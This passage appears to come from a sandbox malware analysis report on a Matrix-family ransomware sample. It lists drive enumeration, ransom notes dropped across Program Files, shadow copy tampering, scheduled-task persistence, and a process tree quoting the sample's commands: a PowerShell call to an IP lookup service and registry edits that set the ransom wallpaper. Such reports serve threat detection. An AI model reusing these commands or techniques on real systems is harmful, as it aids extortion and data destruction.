File opened for modification	C:\Users\Admin\OneDrive\desktop.ini	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File opened for modification	C:\Users\Admin\Contacts\desktop.ini	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File opened for modification	C:\Users\Public\Documents\desktop.ini	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File opened for modification	C:\Users\Admin\Pictures\Saved Pictures\desktop.ini	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File opened for modification	C:\Users\Public\desktop.ini	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File opened for modification	C:\Users\Public\Downloads\desktop.ini	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File opened for modification	C:\Program Files\desktop.ini	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File opened for modification	C:\Program Files (x86)\desktop.ini	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File opened for modification	C:\Users\Public\Pictures\desktop.ini	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File opened for modification	C:\Users\Public\Libraries\desktop.ini	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File opened for modification	C:\Users\Public\Desktop\desktop.ini	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File opened for modification	C:\Users\Admin\3D Objects\desktop.ini	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File opened for modification	C:\Users\Admin\Pictures\Camera Roll\desktop.ini	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe

Enumerates connected drives 3 TTPs 44 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\L:	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File opened (read-only)	\??\G:	aZQFKO5164.exe
File opened (read-only)	\??\S:	aZQFKO5164.exe
File opened (read-only)	\??\U:	aZQFKO5164.exe
File opened (read-only)	\??\B:	aZQFKO5164.exe
File opened (read-only)	\??\E:	aZQFKO5164.exe
File opened (read-only)	\??\O:	aZQFKO5164.exe
File opened (read-only)	\??\X:	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File opened (read-only)	\??\M:	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File opened (read-only)	\??\J:	aZQFKO5164.exe
File opened (read-only)	\??\X:	aZQFKO5164.exe
File opened (read-only)	\??\Y:	aZQFKO5164.exe
File opened (read-only)	\??\I:	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File opened (read-only)	\??\G:	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File opened (read-only)	\??\R:	aZQFKO5164.exe
File opened (read-only)	\??\Z:	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File opened (read-only)	\??\Y:	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File opened (read-only)	\??\W:	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File opened (read-only)	\??\V:	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File opened (read-only)	\??\T:	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File opened (read-only)	\??\A:	aZQFKO5164.exe
File opened (read-only)	\??\L:	aZQFKO5164.exe
File opened (read-only)	\??\M:	aZQFKO5164.exe
File opened (read-only)	\??\Q:	aZQFKO5164.exe
File opened (read-only)	\??\S:	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File opened (read-only)	\??\Q:	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File opened (read-only)	\??\P:	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File opened (read-only)	\??\J:	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File opened (read-only)	\??\I:	aZQFKO5164.exe
File opened (read-only)	\??\P:	aZQFKO5164.exe
File opened (read-only)	\??\T:	aZQFKO5164.exe
File opened (read-only)	\??\O:	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File opened (read-only)	\??\K:	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File opened (read-only)	\??\H:	aZQFKO5164.exe
File opened (read-only)	\??\K:	aZQFKO5164.exe
File opened (read-only)	\??\N:	aZQFKO5164.exe
File opened (read-only)	\??\V:	aZQFKO5164.exe
File opened (read-only)	\??\W:	aZQFKO5164.exe
File opened (read-only)	\??\Z:	aZQFKO5164.exe
File opened (read-only)	\??\U:	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File opened (read-only)	\??\R:	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File opened (read-only)	\??\N:	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File opened (read-only)	\??\H:	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File opened (read-only)	\??\E:	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
156	myexternalip.com

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-513485977-2495024337-1260977654-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\u09Awf1y.bmp"	reg.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.25\System.Net.WebHeaderCollection.dll	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.0\PresentationFramework.Classic.dll	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\sv\LC_MESSAGES\vlc.mo	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\plugins\access\libaccess_imem_plugin.dll	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.0\pl\WindowsFormsIntegration.resources.dll	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.0\ru\System.Windows.Controls.Ribbon.resources.dll	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\kk.pak.DATA	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File opened for modification	C:\Program Files\Java\jre-1.8\COPYRIGHT	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File created	C:\Program Files\Java\jre-1.8\lib\security\policy\limited\#ANN_README#.rtf	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\sr.pak.DATA	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.25\ko\PresentationCore.resources.dll	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File created	C:\Program Files\VideoLAN\VLC\locale\sr\LC_MESSAGES\#ANN_README#.rtf	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\plugins\video_filter\libblend_plugin.dll	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File created	C:\Program Files\VideoLAN\VLC\locale\th\LC_MESSAGES\#ANN_README#.rtf	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.0\pl\UIAutomationTypes.resources.dll	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File opened for modification	C:\Program Files\Mozilla Firefox\plugin-container.exe	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\plugins\audio_mixer\libinteger_mixer_plugin.dll	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.25\System.Diagnostics.TraceSource.dll	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.0\ja\UIAutomationClient.resources.dll	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\1.3.185.17\msedgeupdateres_en.dll	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.0\zh-Hans\PresentationFramework.resources.dll	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\jps.exe	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\plugins\audio_filter\libkaraoke_plugin.dll	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File created	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\MLModels\#ANN_README#.rtf	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.0\fr\System.Windows.Forms.resources.dll	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File opened for modification	C:\Program Files\Mozilla Firefox\uninstall\uninstall.log	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\VisualElements\SmallLogoDev.png.DATA	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.0\Microsoft.Win32.Registry.AccessControl.dll	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\bg\LC_MESSAGES\vlc.mo	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\plugins\access\libdtv_plugin.dll	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\include\win32\bridge\AccessBridgeCalls.h	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\legal\jdk\relaxngcc.md	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\legal\jdk\xmlresolver.md	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\hprof.dll	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\meta\art\03_lastfm.luac	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\VisualElements\SmallLogoBeta.png	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\plugins\audio_filter\libaudio_format_plugin.dll	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\plugins\video_output\libdirectdraw_plugin.dll	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\plugins\misc\libvod_rtsp_plugin.dll	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File created	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Trust Protection Lists\#ANN_README#.rtf	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.0\cs\System.Windows.Forms.resources.dll	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.0\zh-Hant\UIAutomationTypes.resources.dll	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\lib\content-types.properties	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File opened for modification	C:\Program Files\Java\jre-1.8\lib\cmm\PYCC.pf	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\1.3.185.17\msedgeupdateres_bn.dll	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File opened for modification	C:\Program Files\Java\jre-1.8\THIRDPARTYLICENSEREADME-JAVAFX.txt	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\plugins\video_chroma\librv32_plugin.dll	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.0\System.IO.dll	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.25\PresentationUI.dll	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\co\LC_MESSAGES\vlc.mo	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.0\System.Text.Encoding.dll	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\plugins\demux\libts_plugin.dll	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\1.3.185.17\msedgeupdateres_fi.dll	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\jsoundds.dll	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\lib\jconsole.jar	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File created	C:\Program Files (x86)\Microsoft\Edge\#ANN_README#.rtf	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.0\pl\PresentationFramework.resources.dll	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File opened for modification	C:\Program Files\Mozilla Firefox\omni.ja	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\fr-CA.pak	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\106.0.5249.119\WidevineCdm\manifest.json	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\lib\hijrah-config-umalqura.properties	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\nn\LC_MESSAGES\vlc.mo	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\plugins\logger\libconsole_logger_plugin.dll	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\lib\security\java.policy	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
1700	schtasks.exe

Interacts with shadow copies 2 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

pid	Process
6104	vssadmin.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

pid	Process
4832	powershell.exe
4832	powershell.exe
4832	powershell.exe
2064	aZQFKO5164.exe
2064	aZQFKO5164.exe
2064	aZQFKO5164.exe
2064	aZQFKO5164.exe
2064	aZQFKO5164.exe
2064	aZQFKO5164.exe
2064	aZQFKO5164.exe
2064	aZQFKO5164.exe
2064	aZQFKO5164.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
2064	aZQFKO5164.exe

Suspicious use of AdjustPrivilegeToken 48 IoCs

description	pid	Process
Token: SeDebugPrivilege	4832	powershell.exe
Token: SeDebugPrivilege	2064	aZQFKO5164.exe
Token: SeLoadDriverPrivilege	2064	aZQFKO5164.exe
Token: SeBackupPrivilege	5776	vssvc.exe
Token: SeRestorePrivilege	5776	vssvc.exe
Token: SeAuditPrivilege	5776	vssvc.exe
Token: SeIncreaseQuotaPrivilege	5712	WMIC.exe
Token: SeSecurityPrivilege	5712	WMIC.exe
Token: SeTakeOwnershipPrivilege	5712	WMIC.exe
Token: SeLoadDriverPrivilege	5712	WMIC.exe
Token: SeSystemProfilePrivilege	5712	WMIC.exe
Token: SeSystemtimePrivilege	5712	WMIC.exe
Token: SeProfSingleProcessPrivilege	5712	WMIC.exe
Token: SeIncBasePriorityPrivilege	5712	WMIC.exe
Token: SeCreatePagefilePrivilege	5712	WMIC.exe
Token: SeBackupPrivilege	5712	WMIC.exe
Token: SeRestorePrivilege	5712	WMIC.exe
Token: SeShutdownPrivilege	5712	WMIC.exe
Token: SeDebugPrivilege	5712	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5712	WMIC.exe
Token: SeRemoteShutdownPrivilege	5712	WMIC.exe
Token: SeUndockPrivilege	5712	WMIC.exe
Token: SeManageVolumePrivilege	5712	WMIC.exe
Token: 33	5712	WMIC.exe
Token: 34	5712	WMIC.exe
Token: 35	5712	WMIC.exe
Token: 36	5712	WMIC.exe
Token: SeIncreaseQuotaPrivilege	5712	WMIC.exe
Token: SeSecurityPrivilege	5712	WMIC.exe
Token: SeTakeOwnershipPrivilege	5712	WMIC.exe
Token: SeLoadDriverPrivilege	5712	WMIC.exe
Token: SeSystemProfilePrivilege	5712	WMIC.exe
Token: SeSystemtimePrivilege	5712	WMIC.exe
Token: SeProfSingleProcessPrivilege	5712	WMIC.exe
Token: SeIncBasePriorityPrivilege	5712	WMIC.exe
Token: SeCreatePagefilePrivilege	5712	WMIC.exe
Token: SeBackupPrivilege	5712	WMIC.exe
Token: SeRestorePrivilege	5712	WMIC.exe
Token: SeShutdownPrivilege	5712	WMIC.exe
Token: SeDebugPrivilege	5712	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5712	WMIC.exe
Token: SeRemoteShutdownPrivilege	5712	WMIC.exe
Token: SeUndockPrivilege	5712	WMIC.exe
Token: SeManageVolumePrivilege	5712	WMIC.exe
Token: 33	5712	WMIC.exe
Token: 34	5712	WMIC.exe
Token: 35	5712	WMIC.exe
Token: 36	5712	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2852 wrote to memory of 528	2852	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe	87
PID 2852 wrote to memory of 528	2852	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe	87
PID 2852 wrote to memory of 528	2852	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe	87
PID 2852 wrote to memory of 640	2852	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe	89
PID 2852 wrote to memory of 640	2852	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe	89
PID 2852 wrote to memory of 640	2852	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe	89
PID 2852 wrote to memory of 3512	2852	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe	97
PID 2852 wrote to memory of 3512	2852	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe	97
PID 2852 wrote to memory of 3512	2852	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe	97
PID 3512 wrote to memory of 4832	3512	cmd.exe	99
PID 3512 wrote to memory of 4832	3512	cmd.exe	99
PID 3512 wrote to memory of 4832	3512	cmd.exe	99
PID 2852 wrote to memory of 3456	2852	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe	102
PID 2852 wrote to memory of 3456	2852	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe	102
PID 2852 wrote to memory of 3456	2852	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe	102
PID 2852 wrote to memory of 2288	2852	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe	103
PID 2852 wrote to memory of 2288	2852	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe	103
PID 2852 wrote to memory of 2288	2852	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe	103
PID 3456 wrote to memory of 1360	3456	cmd.exe	106
PID 3456 wrote to memory of 1360	3456	cmd.exe	106
PID 3456 wrote to memory of 1360	3456	cmd.exe	106
PID 3456 wrote to memory of 2304	3456	cmd.exe	107
PID 3456 wrote to memory of 2304	3456	cmd.exe	107
PID 3456 wrote to memory of 2304	3456	cmd.exe	107
PID 3456 wrote to memory of 908	3456	cmd.exe	109
PID 3456 wrote to memory of 908	3456	cmd.exe	109
PID 3456 wrote to memory of 908	3456	cmd.exe	109
PID 2288 wrote to memory of 3728	2288	cmd.exe	108
PID 2288 wrote to memory of 3728	2288	cmd.exe	108
PID 2288 wrote to memory of 3728	2288	cmd.exe	108
PID 2852 wrote to memory of 4348	2852	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe	110
PID 2852 wrote to memory of 4348	2852	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe	110
PID 2852 wrote to memory of 4348	2852	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe	110
PID 4348 wrote to memory of 1552	4348	cmd.exe	112
PID 4348 wrote to memory of 1552	4348	cmd.exe	112
PID 4348 wrote to memory of 1552	4348	cmd.exe	112
PID 4348 wrote to memory of 3976	4348	cmd.exe	113
PID 4348 wrote to memory of 3976	4348	cmd.exe	113
PID 4348 wrote to memory of 3976	4348	cmd.exe	113
PID 4348 wrote to memory of 4200	4348	cmd.exe	114
PID 4348 wrote to memory of 4200	4348	cmd.exe	114
PID 4348 wrote to memory of 4200	4348	cmd.exe	114
PID 4348 wrote to memory of 4116	4348	cmd.exe	116
PID 4348 wrote to memory of 4116	4348	cmd.exe	116
PID 4348 wrote to memory of 4116	4348	cmd.exe	116
PID 4116 wrote to memory of 2812	4116	cmd.exe	117
PID 4116 wrote to memory of 2812	4116	cmd.exe	117
PID 4116 wrote to memory of 2812	4116	cmd.exe	117
PID 2812 wrote to memory of 2064	2812	aZQFKO51.exe	118
PID 2812 wrote to memory of 2064	2812	aZQFKO51.exe	118
PID 3728 wrote to memory of 5504	3728	wscript.exe	119
PID 3728 wrote to memory of 5504	3728	wscript.exe	119
PID 3728 wrote to memory of 5504	3728	wscript.exe	119
PID 5504 wrote to memory of 1700	5504	cmd.exe	121
PID 5504 wrote to memory of 1700	5504	cmd.exe	121
PID 5504 wrote to memory of 1700	5504	cmd.exe	121
PID 3728 wrote to memory of 1888	3728	wscript.exe	122
PID 3728 wrote to memory of 1888	3728	wscript.exe	122
PID 3728 wrote to memory of 1888	3728	wscript.exe	122
PID 1888 wrote to memory of 5124	1888	cmd.exe	124
PID 1888 wrote to memory of 5124	1888	cmd.exe	124
PID 1888 wrote to memory of 5124	1888	cmd.exe	124
PID 5204 wrote to memory of 6104	5204	cmd.exe	127
PID 5204 wrote to memory of 6104	5204	cmd.exe	127

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
1552	attrib.exe

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe"
1⤵
- Matrix Ransomware
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:2852
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe" "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWavTkgQ.exe"
  2⤵
  PID:528
- C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWavTkgQ.exe
  "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWavTkgQ.exe" -n
  2⤵
  - Executes dropped EXE
  PID:640
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\rtoOk20O.txt"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3512
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4832
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\u09Awf1y.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3456
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\u09Awf1y.bmp" /f
    3⤵
    - Sets desktop wallpaper using registry
    PID:1360
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f
    3⤵
    PID:2304
- - C:\Windows\SysWOW64\reg.exe
